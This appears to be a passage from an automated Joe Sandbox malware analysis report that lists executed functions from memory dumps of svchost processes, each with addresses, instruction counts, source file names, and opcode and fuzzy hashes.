                                                        • Instruction ID: 1a3bcc9f0708b5deee7312127151932c6a4374df8c8690067e0f9adee9d32926
                                                        • Opcode Fuzzy Hash: 2605148c8b39e8e7b6192138fef8f2bc239f9cf3d76cd3f1fed476ac4800f8a7
                                                        • Instruction Fuzzy Hash: 7131EB33D0E69A4FE706B7BCA8662F93B61FF66391F0801B7C084CB1A7EE1854098355
                                                        Function 00007FF848DB0985 Relevance: .3, Instructions: 339COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 460e0a9e5075c78f145e788717bba8ca58fba773285f7101c0b852d045b565cb
                                                        • Instruction ID: 4e626b9e1d5433567e41159e2e393c7ee29c457bf33c6094258378f34ff63c53
                                                        • Opcode Fuzzy Hash: 460e0a9e5075c78f145e788717bba8ca58fba773285f7101c0b852d045b565cb
                                                        • Instruction Fuzzy Hash: 61A17826B0A5269ED701BB7DB8562F83B61FF863E1F0405B7C148CB097CA35648AC7E5
                                                        Function 00007FF848DB09D3 Relevance: .3, Instructions: 313COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6a25bd0d4c92ead908cd6e53b53c293870e0b0c49da6d329925aa438ad15db2
                                                        • Instruction ID: 208f57590e6a9cd87ab929b3b4f8162b5dedccd33d997649002a95887d3ad1ab
                                                        • Opcode Fuzzy Hash: f6a25bd0d4c92ead908cd6e53b53c293870e0b0c49da6d329925aa438ad15db2
                                                        • Instruction Fuzzy Hash: E2918526B0A91A9ED700BB7DB8062F83BA1FF853F1F444577C148CB197CA25648AC7E4
                                                        Function 00007FF848DB0A08 Relevance: .3, Instructions: 297COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c18af7c0492566c1f46bf5c2fe9324992be07cf3febe9af8e1617030369b214c
                                                        • Instruction ID: 2ff1b399997baec32836eec9850189cf5472df50193e7b5e44a594c9375914cb
                                                        • Opcode Fuzzy Hash: c18af7c0492566c1f46bf5c2fe9324992be07cf3febe9af8e1617030369b214c
                                                        • Instruction Fuzzy Hash: 28819626B0A91AAED701BB7DB8062F93BA1FF853E1F444577C108C7197CA35648AC7E4
                                                        Function 00007FF848DB0A10 Relevance: .3, Instructions: 294COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 666e31cf5c550ba2c6b5acbfb69a6d405ac52ff45391de368ce1917549be4db5
                                                        • Instruction ID: dc52735ce656cb43a42313f854f3c2f9a4ac0ca45134dad53ae7b008880edb2a
                                                        • Opcode Fuzzy Hash: 666e31cf5c550ba2c6b5acbfb69a6d405ac52ff45391de368ce1917549be4db5
                                                        • Instruction Fuzzy Hash: 60818726B0A91A9ED700BB7DB8062F93BA1FF853E1F444577C108C7197CA35648AC7E4
                                                        Function 00007FF848DB0A48 Relevance: .3, Instructions: 263COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0fa892dd33dcb35560550761bbe15fc260982d22d749a94386522138e516c17b
                                                        • Instruction ID: 5e888793d9e8fbd2a8a935457472b9e42c612e07f8cd3d3d8ff8df8c6cc07d24
                                                        • Opcode Fuzzy Hash: 0fa892dd33dcb35560550761bbe15fc260982d22d749a94386522138e516c17b
                                                        • Instruction Fuzzy Hash: 1C716726B0A91AAED701BB7DB4162F93BA1FF853E1F440576C108C7197CA35648AC7E4
                                                        Function 00007FF848DB0638 Relevance: .1, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 115c28a9ed207f0bebc5d1b58320dfb777dad85ea53ac6b5185b11bb7ca95d90
                                                        • Instruction ID: 0502c75757c80d80d2d93b3e92539c808075b1dff39cf9254251737f6e053e6f
                                                        • Opcode Fuzzy Hash: 115c28a9ed207f0bebc5d1b58320dfb777dad85ea53ac6b5185b11bb7ca95d90
                                                        • Instruction Fuzzy Hash: 7831F521F1D9490FE798FB2CA85A379B6D2EB99791F0401BEE40EC32D7DE289C418345
                                                        Function 00007FF848DB0D26 Relevance: .1, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d869635ffa9b59e877e4120e181a06c58e4d70512587f397d7b2a1a5706641c
                                                        • Instruction ID: d5eef6ee86250cfb15da7c204ee18dedd27a71bf47196a650441d7ba229cd6f7
                                                        • Opcode Fuzzy Hash: 2d869635ffa9b59e877e4120e181a06c58e4d70512587f397d7b2a1a5706641c
                                                        • Instruction Fuzzy Hash: BB31A221F1E94A5FE784B7BC581A3B976D2FFA8791F04017AE40DC3286EE285C458392
                                                        Function 00007FF848DB0BD3 Relevance: .1, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da199da0ba99e7f57b80e4252b2843a374b5a9bbe3d325debd91b2f5a170ba1f
                                                        • Instruction ID: 68acd72130d36f6b8d9f234d9474e930b9f7ad0b8179e5f79bfe70745cbfa4dd
                                                        • Opcode Fuzzy Hash: da199da0ba99e7f57b80e4252b2843a374b5a9bbe3d325debd91b2f5a170ba1f
                                                        • Instruction Fuzzy Hash: 59419030E1E64A8FDB45FB7898557BD7BA2FF98380F5005B5D009D32C6CE3968058755
                                                        Function 00007FF848DB0858 Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24b6e211ce3343b25566fcb7c83dfb2471f60a662482e18f52e88c26bcc0d983
                                                        • Instruction ID: 4ecad4815933e3bc93f40e68e5fe2e68c77bed2ed980803cca2fc782457fba2a
                                                        • Opcode Fuzzy Hash: 24b6e211ce3343b25566fcb7c83dfb2471f60a662482e18f52e88c26bcc0d983
                                                        • Instruction Fuzzy Hash: 1331E12194A6495FD381EB3890A92B93FB2FFA83C0FC041E5D908C73CBCE3469048766
                                                        Function 00007FF848DB0870 Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c880ecee620ddfc2d4cced154bb825e845433d3ae7cdbd0be88c6b16e4015d8
                                                        • Instruction ID: bd93cd1ebe8dc493ec8221b3c87d1f35204d9fc13ce33b7474ff2705251f5d4e
                                                        • Opcode Fuzzy Hash: 1c880ecee620ddfc2d4cced154bb825e845433d3ae7cdbd0be88c6b16e4015d8
                                                        • Instruction Fuzzy Hash: 3921A231A5A6495FD751EB3894A96B97FB2FFA83C0FC045A5D908C33CACE3469048762
                                                        Function 00007FF848DB22C1 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bdf5fbe83e84fadd3826becd4a8ec0a47bda11b05efc3a1751f399d2e94e66ce
                                                        • Instruction ID: 36f78cac36496825f3530cbc8f867cd70f94d114db541e5c6f833daa4bdf5586
                                                        • Opcode Fuzzy Hash: bdf5fbe83e84fadd3826becd4a8ec0a47bda11b05efc3a1751f399d2e94e66ce
                                                        • Instruction Fuzzy Hash: 1001262590EB850FE791BB3818551357FE09FA12C0F0804AAD888C7197D90859898356

                                                        Executed Functions

                                                        Function 00007FF848DA16DE Relevance: .7, Instructions: 714COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 243852bede3c886188c610becafa8e2ec5af04f65cad882c8143d83d2b40de21
                                                        • Instruction ID: b97a659f78d546464fee3a9a309028f54cee38286177574443fa61b42e35acd6
                                                        • Opcode Fuzzy Hash: 243852bede3c886188c610becafa8e2ec5af04f65cad882c8143d83d2b40de21
                                                        • Instruction Fuzzy Hash: 6422F220B2EA4A9FEB98F73894593B977D2FF88781F540579D04EC32C6DF28A8058745
                                                        Function 00007FF848DA1719 Relevance: .7, Instructions: 665COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 817bfbc752ccef74a566559ef32609facec759d4276f66691993e83c40f7f625
                                                        • Instruction ID: 985a9d5ac80e3bb78926e78a0d068d34d6613a474338df7ce11b08b128f7ffa7
                                                        • Opcode Fuzzy Hash: 817bfbc752ccef74a566559ef32609facec759d4276f66691993e83c40f7f625
                                                        • Instruction Fuzzy Hash: 49220220B2EA499FEB98F73894593B976E2FF88781F540579D04EC32C6CF28AC058745
                                                        Function 00007FF848DA20F1 Relevance: .2, Instructions: 212COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 869e518e4cefb746bb3f62c9ae8fad7c507a62da47d66fb0976a11d2b0dd2b34
                                                        • Instruction ID: 5fb63d3abcd34af46ddf6424e72960b67ecd2efa7afe95c6216d506bec0befa4
                                                        • Opcode Fuzzy Hash: 869e518e4cefb746bb3f62c9ae8fad7c507a62da47d66fb0976a11d2b0dd2b34
                                                        • Instruction Fuzzy Hash: AC511110B1E6C95FD796AB3858643B67FE1DF87255F1801FBE089C7197DE08080AC356
                                                        Function 00007FF848DA0AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 9M_^
                                                        • API String ID: 0-1708477388
                                                        • Opcode ID: 3846cc09e15a31fbc0cca9c67c066ca71b95fe5da586d2b1a56ea352e25fc431
                                                        • Instruction ID: 12f75c0398ee8333494c6e83db03d78639eb7fb0c22f6c6307684ad07aeb4d96
                                                        • Opcode Fuzzy Hash: 3846cc09e15a31fbc0cca9c67c066ca71b95fe5da586d2b1a56ea352e25fc431
                                                        • Instruction Fuzzy Hash: 38610325A0F61EDED700BB6DA4153FC77A2EF843A5F144276D00CC7187CE29644A87A8
                                                        Function 00007FF848DA0E8E Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4M_^
                                                        • API String ID: 0-2545914641
                                                        • Opcode ID: eb86f6a3c73fa5a462567a3d2064b7a669b9039ed0c6840839978e2430d1f773
                                                        • Instruction ID: 69c22eda4b691d95355734b522978581709c96c3a7bc82539b69a1592ed5a637
                                                        • Opcode Fuzzy Hash: eb86f6a3c73fa5a462567a3d2064b7a669b9039ed0c6840839978e2430d1f773
                                                        • Instruction Fuzzy Hash: 21510321A0FBC65FE396B63898662B57BE1EF86660B0940FBD08CC7197DD1C5C468362
                                                        Function 00007FF848DA1295 Relevance: .9, Instructions: 866COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae699f09f9ebefdda2f69a9bf505f12eaf45a2dd3e3bf10ffc11ae7210ad7f86
                                                        • Instruction ID: 24838f631c642908a80e8ea3a5899426423c7b2bc777fac1f7a6e6d921131568
                                                        • Opcode Fuzzy Hash: ae699f09f9ebefdda2f69a9bf505f12eaf45a2dd3e3bf10ffc11ae7210ad7f86
                                                        • Instruction Fuzzy Hash: 4C31C532D0F69A8FE705B77CA8652F97BA1EF56251F0802F7C089CB193EE1854098354
                                                        Function 00007FF848DA0985 Relevance: .3, Instructions: 346COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 86ef49d3344ae58acb048f938c87a1d1cc71378ce3c33c0d631a5813a8730ba8
                                                        • Instruction ID: 5fac83437d20a40785c28d27fb93af8cefdf24558ce1b74a9e8cea395b9ecc6e
                                                        • Opcode Fuzzy Hash: 86ef49d3344ae58acb048f938c87a1d1cc71378ce3c33c0d631a5813a8730ba8
                                                        • Instruction Fuzzy Hash: 36A14926B0E56EDED700BB7DA8552FD7BA1EF85376F0402B7C048CB187CA24644A87E5
                                                        Function 00007FF848DA09D3 Relevance: .3, Instructions: 320COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a430bc2fe2fea723ab4b9ffaf45cef891651add48c58cf75b8b4c7901f15cf7e
                                                        • Instruction ID: c0ace5141fbcda9d2245cf02ae582ad7f4585dc9cd723e4bad61f738ede0c8bb
                                                        • Opcode Fuzzy Hash: a430bc2fe2fea723ab4b9ffaf45cef891651add48c58cf75b8b4c7901f15cf7e
                                                        • Instruction Fuzzy Hash: 99913426B0A56EDED700BB7DB4152F97BA1EF853B6F4442B7C048CB187CE24644A87E4
                                                        Function 00007FF848DA0A08 Relevance: .3, Instructions: 305COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6d3927a594fb27ca902112865f48e4131509acd70da47ca2038435d1e1a3b0f
                                                        • Instruction ID: 5a0d8b3d304dee3088214dce7f1b6fcd76c4761d84c75c69cabc1cf98a287ef4
                                                        • Opcode Fuzzy Hash: f6d3927a594fb27ca902112865f48e4131509acd70da47ca2038435d1e1a3b0f
                                                        • Instruction Fuzzy Hash: 32813626B0A52EDED700BB7DA4152FD7BA2EF853B6F144277C048C7187CE24644A87E4
                                                        Function 00007FF848DA0A10 Relevance: .3, Instructions: 301COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0494894dc9cadbc22685be8bbf7a22c87c61a02814647eb323b09cdab8483c50
                                                        • Instruction ID: 2fd18be24960b92ce75cc57e87e3d7725b37707265c94f50a833d4e19df07d7f
                                                        • Opcode Fuzzy Hash: 0494894dc9cadbc22685be8bbf7a22c87c61a02814647eb323b09cdab8483c50
                                                        • Instruction Fuzzy Hash: F6812526B0A52EDED700BB7DA4152F97BA2EF853B6F144277D048C7187CE24644A87E4
                                                        Function 00007FF848DA0A48 Relevance: .3, Instructions: 270COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 45fceeaf5556ef1064a0e93724092c9cb888f9dcad8f50cf2aac5e751086f93e
                                                        • Instruction ID: c24403b2d15faffe37d2eaf45a082c462746f900cd06dc634e7fcbbd903a2524
                                                        • Opcode Fuzzy Hash: 45fceeaf5556ef1064a0e93724092c9cb888f9dcad8f50cf2aac5e751086f93e
                                                        • Instruction Fuzzy Hash: 2D713426B0A52EDED700BB7DA4152FD7BA2FF853A6F1442B6D048C7187CE24644AC7A4
                                                        Function 00007FF848DA0638 Relevance: .1, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6ba0d7c94f2fb6c4b0744cddc66c1210c9fc1a657602593d8b66b376de5c5659
                                                        • Instruction ID: 096cc2cf4ff703407a73294f0979d4f9887887c7e513337629ff116c8d39a34c
                                                        • Opcode Fuzzy Hash: 6ba0d7c94f2fb6c4b0744cddc66c1210c9fc1a657602593d8b66b376de5c5659
                                                        • Instruction Fuzzy Hash: E831F721F1DA490FE798FB2C9459379B6D2EB98791F0401BEE40EC32D7DE289C418341
                                                        Function 00007FF848DA0D26 Relevance: .1, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 912e58aa002fc144b35a0974af9849cf0a580376cf3cac2accf766f184c87368
                                                        • Instruction ID: 9be642967017690ac39fb4013937fe3419dceb222dce8f96af18d8c7edc9a916
                                                        • Opcode Fuzzy Hash: 912e58aa002fc144b35a0974af9849cf0a580376cf3cac2accf766f184c87368
                                                        • Instruction Fuzzy Hash: B031C411F1EA4A9FE744B7BC581A3F876D2FF98751F14017AE40DC3286DE285C458351
                                                        Function 00007FF848DA0BD3 Relevance: .1, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ddfab2bdb07cdba3daf081822219d94ec66145b83fedea53d2bbc6947169568
                                                        • Instruction ID: 192c641a3857f6ae6d78326bf77384283c52e15dfe50bd3177f415523d294c0c
                                                        • Opcode Fuzzy Hash: 0ddfab2bdb07cdba3daf081822219d94ec66145b83fedea53d2bbc6947169568
                                                        • Instruction Fuzzy Hash: 08419030A1EA4D9FDB84FB6884653BDB7E2FF89342F540575D009D3286CE3968098761
                                                        Function 00007FF848DA0858 Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: febe68306df1d63132cc76d34dc5618daca2d7b5d6f285556eed21ac2ba41cc2
                                                        • Instruction ID: 68bf4bc160c6641f606a86a46a19e3cc83a78daebefe811083f370d9b9ad35b1
                                                        • Opcode Fuzzy Hash: febe68306df1d63132cc76d34dc5618daca2d7b5d6f285556eed21ac2ba41cc2
                                                        • Instruction Fuzzy Hash: 7E31A22490E6CD9FD385FB2C80A42B97BB2EF95286F8444A5D04CD728BCF385805C766
                                                        Function 00007FF848DA0870 Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7708e184bd880fdceadccd99b71449dc69211f9fb7e5d6046ff782218b31a675
                                                        • Instruction ID: 74e594bc9a17c88d04f85705ab7480aa60845925e383025bdf06e18a700b5472
                                                        • Opcode Fuzzy Hash: 7708e184bd880fdceadccd99b71449dc69211f9fb7e5d6046ff782218b31a675
                                                        • Instruction Fuzzy Hash: F221712490E68D9FD395FB2C84A46B97BB2EF94246F8444A5D44CD33CECF385904C766
                                                        Function 00007FF848DA22C1 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 23987cbf5746b4afd0614306e8002574aa0759b3485a00977e6dd57bcaf1a4e1
                                                        • Instruction ID: 96615542fb4f084d7f277d516eefd7fde007685cf325862f9e69ed71f06d2819
                                                        • Opcode Fuzzy Hash: 23987cbf5746b4afd0614306e8002574aa0759b3485a00977e6dd57bcaf1a4e1
                                                        • Instruction Fuzzy Hash: 66014925A0EBC54FE791B73918556757FF0DF92281F0804BAE8D8C70DBDA08A9898356

                                                        Executed Functions

                                                        Function 00007FF848D71719 Relevance: .7, Instructions: 695COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cf4f363719a4dc9f77d149dbbc2712e673f713296e68c2735319172e26ef6486
                                                        • Instruction ID: 91f0246cbd38dd4bcad8748a575ed753ae22161f1c1e5b03fc67ee8a412fdc31
                                                        • Opcode Fuzzy Hash: cf4f363719a4dc9f77d149dbbc2712e673f713296e68c2735319172e26ef6486
                                                        • Instruction Fuzzy Hash: 3022D220A2EA495FEB98FB3894697BD76D2FF98780F440579D00EC32C6DF286C458749
                                                        Function 00007FF848D70AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 9P_^
                                                        • API String ID: 0-1898675183
                                                        • Opcode ID: 9ab33d18aca2f7ce5f5fececbc47f3228e385ee152da69183703361900b7842a
                                                        • Instruction ID: de229dda4c869d4845c07630f20cc48221887e753b3e95e1d6a603b4f01d7ff1
                                                        • Opcode Fuzzy Hash: 9ab33d18aca2f7ce5f5fececbc47f3228e385ee152da69183703361900b7842a
                                                        • Instruction Fuzzy Hash: 71611426A0E51A9EE704BBBDA4557FD37A5FF883A0F444576D00CC71C7CE24648A87B8
                                                        Function 00007FF848D70E8E Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4P_^
                                                        • API String ID: 0-2202116914
                                                        • Opcode ID: 9157e1ba54fb881516faecc9773ace2cc310913977769d1d8c6eea173ae553e1
                                                        • Instruction ID: 1361c4843ae4687d0cadd2364c3c466f80a10fbd36161b3b08eccaf0588c18a0
